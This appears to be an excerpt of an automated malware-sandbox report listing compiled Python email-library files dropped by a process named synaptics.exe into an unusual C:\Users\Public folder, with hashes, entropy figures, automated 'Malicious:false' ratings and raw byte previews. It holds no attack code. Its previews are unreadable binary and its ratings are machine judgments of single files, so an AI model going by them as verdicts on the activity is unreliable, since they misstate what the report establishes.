                                                                                                                                                                                      MD5:F285FB40AC12B7C98D10EC556318E15A
                                                                                                                                                                                      SHA1:2316B7A9EF592D15D9256207F0B4B8048B58FE86
                                                                                                                                                                                      SHA-256:7CCC3072CA3B6B93838ACD0D5A3E6BAAA30B1034F49C2EEC1E8810E617C248DE
                                                                                                                                                                                      SHA-512:1291508C98BA1464C4001E3A28F660C88317B99D283779D34D36156FF5EE7431DFED8E4810681517677D5214D0BE46629747ECD1040275A807C47382C700855C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d$........................@...s0...d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z?A package for parsing, handling, and generating email messages.).Z.base64mime..charsetZ.encoders..errorsZ.feedparser..generator..headerZ.iterators..message..message_from_file..message_from_binary_file..message_from_string..message_from_bytesZ.mimeZ.parserZ.quoprimime..utilsc....................O.... ...d.d.l.m.}...|.|.i.|.......|...S.).zvParse a string into a Message object model... Optional _class and strict are passed to the Parser constructor.. .........Parser)...email.parserr....Z.parsestr)...s..args..kwsr......r.....2C:\Users\Public\QExvbmVOb25l\lib\email\__init__.pyr.... ............r....c....................O...r....).z|Parse a bytes string into a Message object model... Optional _class and strict are passed to the Parser constructor.. r........BytesParser).r....r....Z.parsebytes).r....r....r....r....r....r....r....r....(...r....r....c....................O...r....).z.Rea
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5753
                                                                                                                                                                                      Entropy (8bit):5.418992484992734
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:gOU9w0nmhN4XpaTzT797ta3T8qCpjjRtfklxvvp/qLfrg8NNOGbM//qH1uqs:ygN0UHy8h7fOvh/WgGN6XqHkqs
                                                                                                                                                                                      MD5:E7C75A7AC2CAAB480C1EFCFABE15518E
                                                                                                                                                                                      SHA1:1BC5A788EDB7C6F1171A052BCD76AC945B6C696A
                                                                                                                                                                                      SHA-256:5556C917A0A14C1F2F902721600B50091A580F68C2ECDBADA9AEBE64427E977C
                                                                                                                                                                                      SHA-512:B1A18E86DBB51CD31464974AA940AE5E95C22AAD0B583E08F53CCA490770B76455C8DC696038C64A534FE718BD2341313FC010367A81ECAFFB2F43CA6D08C055
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dF".......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.e...e...d...j.d.d.....Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.e.e.d...<.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.e.d...Z.d.d...Z.e.e.d...Z.e.e.d...Z.d d.d...Z.d.S.)!z. Routines for manipulating RFC2047 encoded words...This is currently a package-private API, but will be considered for promotion.to a public API if there is demand........N)...ascii_letters..digits)...errors)...decode_q..encode_q..decode_b..encode_b..len_q..len_b..decode..encodes....=([a-fA-F0-9]{2})c....................C...s....t...|...d.........S.).N.....)...bytes..fromhex..groupr....)...m..r.....8C:\Users\Public\QExvbmVOb25l\lib\email\_encoded_words.py..<lambda>A...s......r....c....................C...s....|...d.d...}.t.|...g.f.S.).N....._..... )...replace.._q_byte_subber)...encodedr....r....r....r....C...s........r....c....................@...s,...e.Z.d.Z.d.e...d.....e...d.....Z.d.d...Z.d.S.)..._QByteMaps..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12525
                                                                                                                                                                                      Entropy (8bit):5.369377032962507
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:48lfoQBPanIUGehShaPvqfaXJcCMr7UaZbWMFltbgKBk0:XlgoMGePP+7Ua0MpG0
                                                                                                                                                                                      MD5:F79F2B57A076E3FE13818915F2BFAD46
                                                                                                                                                                                      SHA1:9F2587D834D467E694AAB27C7482BE1FD307D872
                                                                                                                                                                                      SHA-256:E9B9EAC8A23FBFB329CE87085D98DF37D771B6CDC9A63C9EC9B2FE2033C97293
                                                                                                                                                                                      SHA-512:E375EBB86CF14907D88EBBE331296DC0224D58DCF36CEC6E4CCF828F9267804984F4AC1E49F063C77D61959B50D078963022A10B04223E365A165677D1101378
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.G.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.g.d...Z.g.d...Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).zcEmail address parsing code...Lifted directly from rfc822.py. This should eventually be rewritten..)...mktime_tz..parsedate..parsedate_tz..quote.....N.. ..z., ).Z.janZ.febZ.marZ.apr..mayZ.junZ.julZ.aug..sep..octZ.novZ.decZ.januaryZ.februaryZ.marchZ.aprilr....Z.juneZ.julyZ.augustZ.septemberZ.octoberZ.novemberZ.december).Z.monZ.tueZ.wedZ.thuZ.friZ.satZ.sunip...i....i....i....iD...i....).Z.UTZ.UTC..GMT..ZZ.ASTZ.ADTZ.ESTZ.EDTZ.CSTZ.CDTZ.MSTZ.MDTZ.PSTZ.PDTc....................C...s,...t.|...}.|.s.d.S.|.d...d.u.r.d.|.d.<.t.|...S.).zQConvert a date string to a time tuple... Accounts for military timezones.. N.....r....)..._parsedate_tz..tuple)...data..res..r.....4C:\Users\Public\QExvbmVOb25l\lib\email\_parseaddr.pyr....-...s................r....c....................C...s....|.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14795
                                                                                                                                                                                      Entropy (8bit):5.0540292722350255
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:jbtx+Novk6H2JvwhY1jaF7AyJAeb7AqDNF/EIRDAysM1Jd/GaOkdlL7+WpSla/AB:jbteoM6H8vPiJAqVDApM1jeaOMh7G5rl
                                                                                                                                                                                      MD5:2E5E7E2B998222298FF3D4901DB0EF7D
                                                                                                                                                                                      SHA1:3131D09977A47C68D27F94942E040E3E5771B8B0
                                                                                                                                                                                      SHA-256:E295DF5EC5256741661105DD55EDF3D1D4862B2189ED622517F8AAA21E7F6905
                                                                                                                                                                                      SHA-512:ABCB98264C79E1292AE69E18FBBB26FAF1DE06F91E048A3C502F290ABFB21DD5DCF020D2264FC677E655406417111AABFEB1E3AA9220AE881FD44CAB29093D90
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dW<.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.G.d.d...d.e.e.j.d...Z.e.G.d.d...d.e.....Z.e...Z.d.S.).zwPolicy framework for the email package...Allows fine grained feature control of how the package parses and emits data.......N)...header)...charset)..._has_surrogates)...Policy..Compat32..compat32c........................s@...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.)..._PolicyBasea....Policy Object basic framework... This class is useless unless subclassed. A subclass should define. class attributes with defaults for any values that are to be. managed by the Policy object. The constructor will then allow. non-default values to be set for these attributes at instance. creation time. The instance will be callable, taking these same. attributes keyword arguments, and returning a new instance. identical to the called instance except for those values changed.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3253
                                                                                                                                                                                      Entropy (8bit):5.384022959760318
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:7OFLsbReNFxrB2QSaR+Eiig25FNV78ojIu:7ELsle35hjn5F5
                                                                                                                                                                                      MD5:CD3EFCEB9F05FF6D5140F93BD6F443A6
                                                                                                                                                                                      SHA1:F1CA7D998F276EA2344EC0A39CC0B0BAEE4758CF
                                                                                                                                                                                      SHA-256:1AAE0853D46FA3B2C8724FC9A7267E075538CBD6EE1ACE14C8890B6E6236BE97
                                                                                                                                                                                      SHA-512:06D64247C25532EF64150983C0049BF76483B7DE9CC409E0426C3B92DBC75C5798464C2D3447BEFF38B4B565CACE226848308FEF48A483ADD24A1DDE792078DD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d^........................@...sl...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d.d...Z.d.e.f.d.d...Z.d.d...Z.e.Z.e.Z.d.S.).a....Base64 content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit.characters encoding known as Base64...It is used in the MIME standards for email to attach images, audio, and text.using some 8-bit character sets to messages...This module provides an interface to encode and decode both headers and bodies.with Base64 encoding...RFC 2045 defines a method for including character set information in an.`encoded-word' in a header. This method is commonly used for 8-bit real names.in To:, From:, Cc:, etc. fields, as well as Subject: lines...This module does not do the line wrapping or end-of-line character conversion.necessary for proper internationalized headers; it only does dumb encoding and.dec
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11588
                                                                                                                                                                                      Entropy (8bit):5.3249924589066016
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:+71q2Qm6z+wY/W28DGmahcQx6Pk/pO5oU/5Ob9WJ//abe8+xGb/+w:e1ZRS+Z+2yGRz/p2/5ObDbv+w
                                                                                                                                                                                      MD5:8F840A3C65347470506D4A464104841A
                                                                                                                                                                                      SHA1:919E09A8A882053F88FA6EFB649CEDAB9DE2C2F4
                                                                                                                                                                                      SHA-256:FFD1CB5F72CDCE46C8E7455F66866B655215AC7AA4F586F8506777265092B71E
                                                                                                                                                                                      SHA-512:6367C77919369A434A936DDF132558B39CB7F580C5DCC86DBE635EEAF79B95C6D8C80DE5DC1429EE38CE5F24850AB7CFF3E8527D96F82DC8A48F3F55BB22A579
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d|D.......................@...s....g.d...Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.d...d.e.e.d.f...d.e.e.d.f...d.e.d.d.f...d.e.d.d.f...e.d.d.f.e.e.d.f.e.e.d.f.d ....Z.i.d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d.d.d.d2d.d3d.d4....Z.d5d6d.d7..Z.d.d8d9..Z.d:d;..Z.d<d=..Z.d>d?..Z.G.d@dA..dA..Z.d.S.)B)...Charset..add_alias..add_charset..add_codec.....)...partialN)...errors)...encode_7or8bit......................us-asciiz.unknown-8bit..z.iso-8859-1z.iso-8859-2z.iso-8859-3z.iso-8859-4z.iso-8859-9z.iso-8859-10z.iso-8859-13z.iso-8859-14z.iso-8859-15z.iso-8859-16z.windows-1252Z.viscii).NNN..big5..gb2312z.euc-jp..iso-2022-jp..shift_jis..utf-8).r....z.koi8-rr......latin_1z.latin-1Z.latin_2z.latin-2Z.latin_3z.latin-3Z.latin_4z.latin-4Z.latin_
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1640
                                                                                                                                                                                      Entropy (8bit):5.09430712102992
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1y7gaTT5rqICrNt7xwM2WuNXwQFd9EGZvPJ5rJxEwkJpDkvyz3:1/9ht7mVWEgQFYSvrEDkvyz3
                                                                                                                                                                                      MD5:6193BC79BEA53F20BCA62D3AACC5FFEC
                                                                                                                                                                                      SHA1:C4D0A292F34C53A94F232E366E0EDEB6F80199E5
                                                                                                                                                                                      SHA-256:C0C8C29C776C24C9C8AE4598BA8654F085BDC812DD5AD1DE5DBB23EEB9ED170A
                                                                                                                                                                                      SHA-512:C7A8DB139F52D89FD20B66EDE74E19CF6D78CA96E2836477925AFE7E9DABB11718AEF5D8FBEAD3C61684F9C0643A16DEC61C2BFC38464989DA8F297C5E4B8015
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d?........................@...sP...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z Encodings and related functions.)...encode_7or8bit..encode_base64..encode_noop..encode_quopri.....)...encodebytes)...encodestringc....................C...s....t.|.d.d...}.|...d.d...S.).NT).Z.quotetabs..... s....=20)..._encodestring..replace)...s..enc..r.....2C:\Users\Public\QExvbmVOb25l\lib\email\encoders.py.._qencode....s........r....c....................C...s0...|.j.d.d...}.t.t.|...d...}.|...|.....d.|.d.<.d.S.).zlEncode the message's payload in Base64... Also, add an appropriate Content-Transfer-Encoding header.. T....decode..ascii..base64..Content-Transfer-EncodingN)...get_payload..str.._bencode..set_payload....msg..origZ.encdatar....r....r....r........s............r....c....................C...s*...|.j.d.d...}.t.|...}.|...|.....d.|.d.<.d.S.).zvEncode the message's payload in quoted-printable... Also, add an appropriate Content-Transfer-Encoding
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5715
                                                                                                                                                                                      Entropy (8bit):4.737415860456932
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:wYI+E7YT1Z5Q6ELjeDJ87gw1aXJE6iqFoARF3IloR/Qg1pDX4Qmbsru3m:wYTEOHQJ2DJ87gtXJniqn3IeWQCQmbsz
                                                                                                                                                                                      MD5:88C8B56B8068A49B414157D6B2450F8A
                                                                                                                                                                                      SHA1:A23EDBD2313AE94BBD8E4DFD397D0130DFC1C610
                                                                                                                                                                                      SHA-256:DD893373CB9027427EA606425FF2A1FDC216A3BC25584A56A04838094FE94CC2
                                                                                                                                                                                      SHA-512:0216C7155551215ECE5783E5BDB8BDE1039247463CEB72A03F3C311F5EBA12273EA7E35564CE009C209E82CEAFA10CA7F0197B6F4A26D059D2D7F2E250332547
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e...Z.G.d+d,..d,e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e...Z.d5S.)6z email package exception classes.c....................@........e.Z.d.Z.d.Z.d.S.)...MessageErrorz+Base class for errors in the email package.N....__name__..__module__..__qualname__..__doc__..r....r.....0C:\Users\Public\QExvbmVOb25l\lib\email\errors.pyr.................r....c....................@...r....)...MessageParseErrorz&Base class for message parsing errors.Nr....r....r....r....r....r........r....r....c....................@...r....)...HeaderParseErrorz.Error while parsing headers.Nr....r....r....r....r....r.....
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10591
                                                                                                                                                                                      Entropy (8bit):5.449741674183775
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:MQt3lEmZ0KYgjRm95weZd6S3DFKTbefqi0G332hjD8gK1W:HtVEe0KYr5weZJ3DFSbeiu329D8j1W
                                                                                                                                                                                      MD5:DEDCFCF06E25914BA9561BC3420DDB48
                                                                                                                                                                                      SHA1:3AAD0AFE226C223554A6C09FF537243CEE56581F
                                                                                                                                                                                      SHA-256:1672B6E2A720869D83C8727B31E88C26A841872159E914B8D591BB84A0DB87C5
                                                                                                                                                                                      SHA-512:94B69F16532D5B893498807998181A136A0B3B3097911D741CF89F0136E42EFECACA1ADCD3FFDB42579C5F17A8D88EA8DB2B8E1EB12ED8AD3C538B424928CF9B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.[.......................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e...d...Z.d.Z.d.Z.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).a....FeedParser - An email feed parser...The feed parser implements an interface for incrementally parsing an email.message, line by line. This has advantages for certain applications, such as.those reading email messages off a socket...FeedParser.feed() is the primary interface for pushing new data into the.parser. It returns when there's nothing more it can do with the available.data. When you have no more data to push into the parser, call .close()..This completes the parsing and returns the root message object...The other advantage of this parser is that it will never raise a parsing.exception. Instead, when it finds something unexpected, it adds a 'defect' to.the current message. Defects are just instances that live on the message.object's .defects a
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16475
                                                                                                                                                                                      Entropy (8bit):5.35787207640989
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:lEojVdGyA82fSNCT4HPb/bl36D/7FCjIMIlaTamNjHMSuXi90MXh:lE//8SScT4vb168cMXh
                                                                                                                                                                                      MD5:46C7FA53E5CE970BC6A186A6DBDF908B
                                                                                                                                                                                      SHA1:2094FEA8D2BF22A5B617E1F27DC06A255B4AC254
                                                                                                                                                                                      SHA-256:7EB19DB03A0BC255446E26C29E32233470EA83D9041C39D2AEA3F447965E68DC
                                                                                                                                                                                      SHA-512:2708534457C130276885CEC9BF5292CB1AB6300798BA15EA203F36E7A03BDCDC5C02D62AA7B509F838A6C6E5886B6E326B9EC4ED6DB6685FB9C2E967E9B6AD46
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dh`.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d...Z.e.d...Z.e...d.e.j.e.j.B...Z.e...d...Z.e...d...Z.e.j.j.Z.d.d...Z.....d.d.d...Z.G.d.d...d...Z.G.d.d...d...Z G.d.d...d.e!..Z"d.S.).z+Header encoding and decoding functionality.)...Header..decode_header..make_header.....N)...HeaderParseError)...charset..... ..... z. ...N...z. ...us-asciiz.utf-8ai.... =\? # literal =?. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset. \? # literal ?. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive. \? # literal ?. (?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string. \?= # literal ?=. z.[\041-\176]+:$z.\n[^ \t]+:c....................C...s....t.|.d...r.d.d...|.j.D...S.t...|...s.|.d.f.g.S.g.}.|.....D.]A}.t...|...}.d.}.|.r^|...d...}.|.r5|.....}.d.}.|.r?|...|.d.d.f.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1981
                                                                                                                                                                                      Entropy (8bit):5.343523285784554
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:mhA49ILWjxxOzvfOoUFQLfMbhoJ9t1eYG1lGLG+hEl9:mrIWdU5UFsMbhOQGTEl9
                                                                                                                                                                                      MD5:5B6D159B4D5B211985B554E7F49C3E03
                                                                                                                                                                                      SHA1:F1FBB68FD429B834F4CE7C9519F6E0C821986273
                                                                                                                                                                                      SHA-256:C7117D12683EB6CEC1A0CE551F009A2AC3DAF9031223E143E78510A3FCABCB76
                                                                                                                                                                                      SHA-512:5D7E7782DF18EB472B294BF4208FDE5678621A37EA03090EC3D83C833D5C1AA5745C4CCAD77DC02DD43F63CA1EFFBD6C32883F77D918AF69E5CCF96A99F2F96D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sJ...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).z1Various types of useful iterators and generators.)...body_line_iterator..typed_subpart_iterator..walk.....N)...StringIOc....................c...s4.....|.V...|.....r.|.....D.].}.|.....E.d.H...q.d.S.d.S.).z.Walk over the message tree, yielding each subpart... The walk is performed in depth-first order. This method is a. generator.. N)...is_multipart..get_payloadr....)...self..subpart..r.....3C:\Users\Public\QExvbmVOb25l\lib\email\iterators.pyr........s..................r....Fc....................c...s8.....|.....D.].}.|.j.|.d...}.t.|.t...r.t.|...E.d.H...q.d.S.).z.Iterate over the parts, returning string payloads line-by-line... Optional decode (default False) is passed through to .get_payload().. )...decodeN).r....r......isinstance..strr....)...msgr....r......payloadr....r....r....r...."...s..................r......textc....................c...s:....
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37817
                                                                                                                                                                                      Entropy (8bit):5.296589999681023
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:43vKre029TBAXUyI2U7AqvYEO9cI9oyCoie5loDEL:SvN029TSUr2cAqJOyI9o7oiUL
                                                                                                                                                                                      MD5:2EDE936427F160B36B1277C422FCD0FA
                                                                                                                                                                                      SHA1:3B4D6A54D4FA37BF2C08A687660B0FD740B5772C
                                                                                                                                                                                      SHA-256:D3D2F278FA90533572E27FFFE669B6834D0ADE622C5CEDF202AB018AEDDEBE44
                                                                                                                                                                                      SHA-512:7F4DFB67F0EFAA7CAF9C645F382A1E2A7F8FD12C5AD683A0747D0EC6826377A8D374A0E351785AC51E3DDE39E2B7678B9DBC925ED76BCFA4CFDA2778CF04D10B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-di........................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.e...d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z8Basic message object for the email package object model...Message..EmailMessage.....N)...BytesIO..StringIO)...utils)...errors)...Policy..compat32....charset)...decode_bz.; z.[ \(\)<>@,;:\\"/\[\]\?=]c....................C...s4...t.|.....d...\.}.}.}.|.s.|.....d.f.S.|.....|.....f.S.).N..;)...str..partition..strip)...param..a..sep..b..r.....1C:\Users\Public\QExvbmVOb25l\lib\email\message.py.._splitparam....s............r....Tc....................C...s....|.d.u.r^t.|...d.k.r^t.|.t...r&|.d.7.}.t...|.d...|.d...|.d.....}.d.|.|.f...S.z.|...d.....W.n...t.yG......|.d.7.}.t...|.d.d...}.d.|.|.f.....Y.S.w.|.sOt...|...rXd.|.t...|...f...S.d.|.|.f...S.|.S.).a~...Convenience function to format and return a key=value pair... This will q
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5686
                                                                                                                                                                                      Entropy (8bit):4.923398082357042
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:l/3XAtZ7ue6RPlVEnTSi7sebc9++etT2FZXUVt3NzMb:pgtZ7+RPETSi7sebc9M2LXUVt3NzMb
                                                                                                                                                                                      MD5:1245201936FED02A9D5A0F0DA228CC55
                                                                                                                                                                                      SHA1:F5B9A993FA8ADEA6A46389AB224C9A58C9BC003A
                                                                                                                                                                                      SHA-256:7B4CF52EBF99D11D2B299BBD18C13F3A45C522882C46D5BEE38C45B30C180731
                                                                                                                                                                                      SHA-512:5714DD9D19AEB18787D62C2FF067F5DE8FBF1CD8116282E9E793299E6A560B935C3E1F62D1709ED7C1568D1A5AD8ECF400C07EF3464B0F0BE7D721266CC98718
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d4........................@...sx...d.Z.g.d...Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).z-A parser of RFC 2822 and MIME email messages.)...Parser..HeaderParser..BytesParser..BytesHeaderParser..FeedParser..BytesFeedParser.....)...StringIO..TextIOWrapper).r....r....)...compat32c....................@...s0...e.Z.d.Z.d.e.d...d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....N....policyc....................C...s....|.|._.|.|._.d.S.).a....Parser of RFC 2822 and MIME email messages... Creates an in-memory object tree representing the email message, which. can then be manipulated and turned over to a Generator to return the. textual representation of the message... The string must be formatted as a block of RFC 2822 headers and header. continuation lines, optionally preceded by a `Unix-from' header. The. header block is terminated either by the end of the string or by a. blank
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7636
                                                                                                                                                                                      Entropy (8bit):5.505282413709055
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:eLJLyjCY2rlgeRk/SE34iIf3HOxK4RVZtp9s7tOcQekFUyq2n1/nGYu9ewBAd7zD:yJYUGQ2SEY27RlpXyyFhnGYQewBk8j4B
                                                                                                                                                                                      MD5:C658F69188E86C909F2C88BF90A221D1
                                                                                                                                                                                      SHA1:EEF818CBA986992E7AE1D7FF8031405E3ACD3E4C
                                                                                                                                                                                      SHA-256:DF43C0D69F622A97DC1649DC2A5227CBCECDCF1259E6512073E3CA18F8EC3965
                                                                                                                                                                                      SHA-512:BEB095E1691C539C49DAC5305D826320B30EBD2C24833051BADD6E0960DBEC0C59BDC340DADE986A42D1F2B75FAC2D365E4B33FAD321B21AAD1DF4A3162821D8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.'.......................@...sF...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.d.d...e.d...D...Z.e.d.d.....Z.e.d.d.....Z.d.e...d.....e...d.....D.].Z.e.e...e.e.<.q;d.e.e.d...<.d.D.].Z.e.e...e.e.<.qLd.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d.d...Z.d.d...Z.d,d.d ..Z.e.d.d.....Z.d!D.].Z.e.e...e.e.<.q.d"e.f.d#d$..Z.e.f.d%d&..Z.e.Z.e.Z.d'd(..Z.d)d*..Z d.S.)-aF...Quoted-printable content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to.safely encode text that is in a character set similar to the 7-bit US ASCII.character set, but that includes some 8-bit characters that are normally not.allowed in email bodies or headers...Quoted-printable is very space-inefficient for encoding binary files; use the.email.base64mime module for that instead...This module provides an interface to encode and decode both headers and bodies.with quoted-p
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9699
                                                                                                                                                                                      Entropy (8bit):5.5284917904338355
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:6bd4YopYU1b0vS5Tc8PNMw1TBrUEPUcXDu4cleZkcLPcCSStw3TG/3Wib/9:vpyv+FSwNBrUmbXDu4zRPiGyGF/9
                                                                                                                                                                                      MD5:03B0731DBA60974F2C20B0A387FD5212
